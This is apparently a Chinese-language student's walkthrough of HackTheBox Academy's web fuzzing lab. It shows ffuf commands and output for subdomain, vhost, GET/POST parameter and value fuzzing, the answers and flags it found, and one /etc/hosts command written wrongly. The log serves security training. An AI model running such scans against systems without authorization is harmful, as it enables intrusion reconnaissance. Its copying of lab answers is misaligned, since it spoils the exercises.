子域模糊 (Sub-domain Fuzzing)
target: HackTheBox有一个在线Swag商店。试着在“hacktebox.eu”上运行子域模糊测试来找到它。它的完整域是什么?
kali跑一下:
ffuf -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt:FUZZ -u https://FUZZ.hackthebox.eu/
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v1.3.1 Kali Exclusive <3
________________________________________________
:: Method : GET
:: URL : https://FUZZ.hackthebox.eu/
:: Wordlist : FUZZ: /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200,204,301,302,307,401,403,405
________________________________________________
www [Status: 301, Size: 0, Words: 1, Lines: 1]
forum [Status: 301, Size: 0, Words: 1, Lines: 1]
dev [Status: 302, Size: 0, Words: 1, Lines: 1]
store [Status: 301, Size: 0, Words: 1, Lines: 1]
forums [Status: 301, Size: 0, Words: 1, Lines: 1]
app [Status: 301, Size: 0, Words: 1, Lines: 1]
help [Status: 301, Size: 0, Words: 1, Lines: 1]
dev2 [Status: 302, Size: 0, Words: 1, Lines: 1]
billing [Status: 302, Size: 101, Words: 5, Lines: 1]
答案应该是这个store很难跑了:https://store.hackthebox.eu
Vhost Fuzzing
我们能够使用公共DNS记录模糊公共子域。然而,当涉及到模糊没有公共DNS记录的子域或非公共网站下的子域时,我们不能使用相同的方法。在本节中,我们将学习如何使用Vhost Fuzzing来做到这一点。
Vhosts vs. Sub-domains
VHosts和子域之间的关键区别在于,VHost基本上是在同一服务器上服务的“子域”,并且具有相同的IP,因此单个IP可以服务于两个或多个不同的网站。
VHosts可能有也可能没有公共DNS记录。
在许多情况下,许多网站实际上会有非公共的子域,并且不会在公共DNS记录中发布它们,因此,如果我们在浏览器中访问它们,我们将无法连接,因为公共DNS不会知道它们的IP。再一次,如果我们使用子域模糊,我们将只能识别公共子域,但无法识别任何非公共子域。
这就是我们在现有IP上使用VHosts Fuzzing的地方。我们将在同一IP上运行扫描和测试扫描,然后我们将能够识别公共和非公共子域以及VHosts。
要扫描VHosts,而无需手动将整个单词列表添加到/etc/hosts,我们将模糊HTTP标头,特别是Host:header。为此,我们可以使用-H标志来指定一个标头,并在其中使用FUZZ关键字,如下所示:
ffuf -w /opt/useful/SecLists/Discovery/DNS/subdomains-top1million-5000.txt:FUZZ -u http://academy.htb:PORT/ -H 'Host: FUZZ.academy.htb'
筛选结果
ffuf -h
...SNIP...
MATCHER OPTIONS:
-mc Match HTTP status codes, or "all" for everything. (default: 200,204,301,302,307,401,403)
-ml Match amount of lines in response
-mr Match regexp
-ms Match HTTP response size
-mw Match amount of words in response
FILTER OPTIONS:
-fc Filter HTTP status codes from response. Comma separated list of codes and ranges
-fl Filter by amount of lines in response. Comma separated list of line counts and ranges
-fr Filter regexp
-fs Filter HTTP response size. Comma separated list of sizes and ranges
-fw Filter by amount of words in response. Comma separated list of word counts and ranges
我们知道错误结果的响应大小,从上面的测试中可以看出,是900,我们可以用-fs 900过滤掉它。
ffuf -w /opt/useful/SecLists/Discovery/DNS/subdomains-top1million-5000.txt:FUZZ -u http://academy.htb:PORT/ -H 'Host: FUZZ.academy.htb' -fs 900
prectice
target:165.232.46.252:32335
试着在“academy.htb”上运行VHost模糊扫描,看看你还能得到什么其他VHost。你还得到了哪些VHosts?
hint:请确保过滤正确!把答案写成“*.academy.htb”。
kali:
先把域名映射放到hosts文件:
echo http://165.232.46.252 academy.htb >> /etc/hosts
扫描:发现结果很多,过滤一下,这里我们发现绝大多数的响应大小是986,过滤掉
ffuf -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt:FUZZ -u http://academy.htb:32335 -H 'Host: FUZZ.academy.htb' -fs 986
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v1.3.1 Kali Exclusive <3
________________________________________________
:: Method : GET
:: URL : http://academy.htb:32335
:: Wordlist : FUZZ: /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt
:: Header : Host: FUZZ.academy.htb
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200,204,301,302,307,401,403,405
:: Filter : Response size: 986
________________________________________________
admin [Status: 200, Size: 0, Words: 1, Lines: 1]
test [Status: 200, Size: 0, Words: 1, Lines: 1]
:: Progress: [4989/4989] :: Job [1/1] :: 125 req/sec :: Duration: [0:00:44] :: Errors: 0 ::
此时只有两个结果,分别try一try,发现都是Secure Connection Failed
很烦,只能都提交试试了,答案是test,很烦。。。
参数模糊(Parameter Fuzzing)
GET请求模糊
类似于我们如何模糊网站的各个部分,我们将使用ffuf来枚举参数。让我们首先从GET请求的模糊处理开始,这些请求通常在URL之后传递,并带有?符号,例如:
http://admin.academy.htb:PORT/admin/admin.php?param1=key.
所以,我们所要做的就是用FUZZ替换上面例子中的param1,然后重新运行我们的扫描。然而,在我们开始之前,我们必须选择一个合适的单词表。再一次,SecLists在/opt/helper/SecLists/Discovery/Web-Content/burp-parameter-names.txt中有这个。有了它,我们可以运行扫描。
practice
target:139.59.185.174:32533
使用您在本节中学到的知识,在此页面上运行参数模糊扫描。这个网页接受的参数是多少?
kali:
ffuf -w /usr/share/seclists/Discovery/Web-Content/burp-parameter-names.txt:FUZZ -u http://admin.academy.htb:32533/admin/admin.php?FUZZ=key -fs 798
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v1.3.1 Kali Exclusive <3
________________________________________________
:: Method : GET
:: URL : http://admin.academy.htb:32533/admin/admin.php?FUZZ=key
:: Wordlist : FUZZ: /usr/share/seclists/Discovery/Web-Content/burp-parameter-names.txt
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200,204,301,302,307,401,403,405
:: Filter : Response size: 798
________________________________________________
user [Status: 200, Size: 783, Words: 221, Lines: 54]
:: Progress: [6453/6453] :: Job [1/1] :: 127 req/sec :: Duration: [0:00:56] :: Errors: 0 ::
user。
POST请求模糊
要用ffuf模糊数据字段,我们可以使用-d标志,正如我们之前在ffuf-h的输出中看到的那样。我们还必须添加-X POST来发送POST请求。
提示:在PHP中,“POST”数据“内容类型”只能接受“application/x-www-form-urlencoded”。因此,我们可以在“ffuf”中用“-H’内容类型:application/x-www-form-urlencoded”来设置它。
ffuf -w /opt/useful/SecLists/Discovery/Web-Content/burp-parameter-names.txt:FUZZ -u http://admin.academy.htb:PORT/admin/admin.php -X POST -d 'FUZZ=key' -H 'Content-Type: application/x-www-form-urlencoded' -fs xxx
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v1.1.0-git
________________________________________________
:: Method : POST
:: URL : http://admin.academy.htb:PORT/admin/admin.php
:: Wordlist : FUZZ: /opt/useful/SecLists/Discovery/Web-Content/burp-parameter-names.txt
:: Header : Content-Type: application/x-www-form-urlencoded
:: Data : FUZZ=key
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200,204,301,302,307,401,403
:: Filter : Response size: xxx
________________________________________________
id [Status: xxx, Size: xxx, Words: xxx, Lines: xxx]
<...SNIP...>
让我们看看如果我们发送带有id参数的POST请求会得到什么。
curl http://admin.academy.htb:PORT/admin/admin.php -X POST -d 'id=key' -H 'Content-Type: application/x-www-form-urlencoded'
<div class='center'><p>Invalid id!</p></div>
值模糊(Value Fuzzing)
这里需要自己判断和创建爆破列表(例:ids.txt)
usage:
ffuf -w ids.txt:FUZZ -u http://admin.academy.htb:PORT/admin/admin.php -X POST -d 'id=FUZZ' -H 'Content-Type: application/x-www-form-urlencoded' -fs xxx
practice
target:139.59.185.174:32533
尝试创建“ids.txt”单词列表,用模糊扫描识别接受的值,然后在带有“curl”的“POST”请求中使用它来收集标志。旗帜的内容是什么?
kali:
ffuf -w ids.txt:FUZZ -u http://admin.academy.htb:32533/admin/admin.php -X POST -d 'id=FUZZ' -H "Content-Type: application/x-www-form-urlencoded" -fs 768
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v1.3.1 Kali Exclusive <3
________________________________________________
:: Method : POST
:: URL : http://admin.academy.htb:32533/admin/admin.php
:: Wordlist : FUZZ: ids.txt
:: Header : Content-Type: application/x-www-form-urlencoded
:: Data : id=FUZZ
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200,204,301,302,307,401,403,405
:: Filter : Response size: 768
________________________________________________
73 [Status: 200, Size: 787, Words: 218, Lines: 54]
:: Progress: [1000/1000] :: Job [1/1] :: 124 req/sec :: Duration: [0:00:10] :: Errors: 0 ::
得到73,try一下:
curl http://admin.academy.htb:32533/admin/admin.php -X POST -d 'id=73' -H "Content-Type: application/x-www-form-urlencoded" -i
HTTP/1.1 200 OK
Date: Wed, 14 Jun 2023 11:00:25 GMT
Server: Apache/2.4.41 (Ubuntu)
Vary: Accept-Encoding
Content-Length: 787
Content-Type: text/html; charset=UTF-8
<div class='center'><p>HTB{p4r4m373r_fuzz1n6_15_k3y!}</p></div>
ok。
Skills Assessment - Web Fuzzing
target:165.232.33.45:32589
- 在“*.academy.htb”上运行子域/虚拟主域模糊测试扫描,以查找上面显示的 IP。您可以识别哪些子域?(只写子域名)
- 在运行页面模糊测试扫描之前,应首先运行扩展模糊测试扫描。域接受哪些不同的扩展名?
- 您将识别的页面之一应显示“您无权访问!什么是整页网址?
- 在上一个问题的页面中,您应该能够找到页面接受的多个参数。它们是什么?
- 尝试模糊您为工作值确定的参数。其中一个应该归还一面旗帜。旗帜的内容是什么?
kali:
ffuf -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt:FUZZ -u http://165.232.33.45:32589/ -H 'Host: FUZZ.academy.htb' -fs 985
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v1.3.1 Kali Exclusive <3
________________________________________________
:: Method : GET
:: URL : http://165.232.33.45:32589/
:: Wordlist : FUZZ: /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt
:: Header : Host: FUZZ.academy.htb
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200,204,301,302,307,401,403,405
:: Filter : Response size: 985
________________________________________________
archive [Status: 200, Size: 0, Words: 1, Lines: 1]
test [Status: 200, Size: 0, Words: 1, Lines: 1]
faculty [Status: 200, Size: 0, Words: 1, Lines: 1]
:: Progress: [4989/4989] :: Job [1/1] :: 128 req/sec :: Duration: [0:00:44] :: Errors: 0 ::
ok,看看第二个问题,要对三个子域一块扫描,最终在faculty中多扫出了一个php7:
ffuf -w /usr/share/seclists/Discovery/Web-Content/web-extensions.txt:FUZZ -u http://faculty.academy.htb:32589/indexFUZZ
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v1.3.1 Kali Exclusive <3
________________________________________________
:: Method : GET
:: URL : http://faculty.academy.htb:32589/indexFUZZ
:: Wordlist : FUZZ: /usr/share/seclists/Discovery/Web-Content/web-extensions.txt
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200,204,301,302,307,401,403,405
________________________________________________
.php [Status: 200, Size: 0, Words: 1, Lines: 1]
.phps [Status: 403, Size: 287, Words: 20, Lines: 10]
.php7 [Status: 200, Size: 0, Words: 1, Lines: 1]
:: Progress: [40/40] :: Job [1/1] :: 35 req/sec :: Duration: [0:00:04] :: Errors: 0 ::
提交三个答案,看第三题,直觉上还是这个faculty和php7有很大嫌疑,因为之前的扫描里只有它的结果比较不一样。来回扫了几个子域,扫的头疼还是没找到,可能是中止得太早了,调用递归让他自己扫,看看比赛~
果然,就是在这个faculty和php7上扫出来了,一共17w个记录扫到了第二轮大概5w多才扫到,也就是22w多条,大概二十分钟不到的样子。乌鱼子,搞个靶场没必要这么折磨呜……只不过查看记录在扫出course目录的时候有提醒扫描这个目录,只不过我在看比赛,提前改目标的话应该能快不少。
ffuf -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-small.txt:FUZZ -u http://faculty.academy.htb:32589/FUZZ -e .php7 -recursion -recursion-depth 1 -v -fs 287 -t 80
...
[Status: 200, Size: 774, Words: 223, Lines: 53]
| URL | http://faculty.academy.htb:32589/courses/linux-security.php7
* FUZZ: linux-security.php7
...
第四题:
ffuf -w /usr/share/seclists/Discovery/Web-Content/burp-parameter-names.txt:FUZZ -u http://faculty.academy.htb:32589/courses/linux-security.php7?FUZZ=key -fs 774 -t 80
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v1.3.1 Kali Exclusive <3
________________________________________________
:: Method : GET
:: URL : http://faculty.academy.htb:32589/courses/linux-security.php7?FUZZ=key
:: Wordlist : FUZZ: /usr/share/seclists/Discovery/Web-Content/burp-parameter-names.txt
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 80
:: Matcher : Response status: 200,204,301,302,307,401,403,405
:: Filter : Response size: 774
________________________________________________
user [Status: 200, Size: 780, Words: 223, Lines: 53]
:: Progress: [6453/6453] :: Job [1/1] :: 229 req/sec :: Duration: [0:00:29] :: Errors: 0 ::
在get方法中的到 user ,看看post,第一遍没扫描出来,php要添加标头'Content-Type: application/x-www-form-urlencoded'
ffuf -w /usr/share/seclists/Discovery/Web-Content/burp-parameter-names.txt:FUZZ -u http://faculty.academy.htb:32589/courses/linux-security.php7 -X POST -d "FUZZ=key" -fs 774 -t 80 -H 'Content-Type: application/x-www-form-urlencoded'
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v1.3.1 Kali Exclusive <3
________________________________________________
:: Method : POST
:: URL : http://faculty.academy.htb:32589/courses/linux-security.php7
:: Wordlist : FUZZ: /usr/share/seclists/Discovery/Web-Content/burp-parameter-names.txt
:: Header : Content-Type: application/x-www-form-urlencoded
:: Data : FUZZ=key
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 80
:: Matcher : Response status: 200,204,301,302,307,401,403,405
:: Filter : Response size: 774
________________________________________________
user [Status: 200, Size: 780, Words: 223, Lines: 53]
username [Status: 200, Size: 781, Words: 223, Lines: 53]
:: Progress: [6453/6453] :: Job [1/1] :: 237 req/sec :: Duration: [0:00:35] :: Errors: 0 ::
多出了一个username,根据做题经验,下一题的答案应该也就是从这个后面多出来的username入手,正好seclists里有一个Usernames文件,try一下:
扫到一个harry,post发送一下得到flag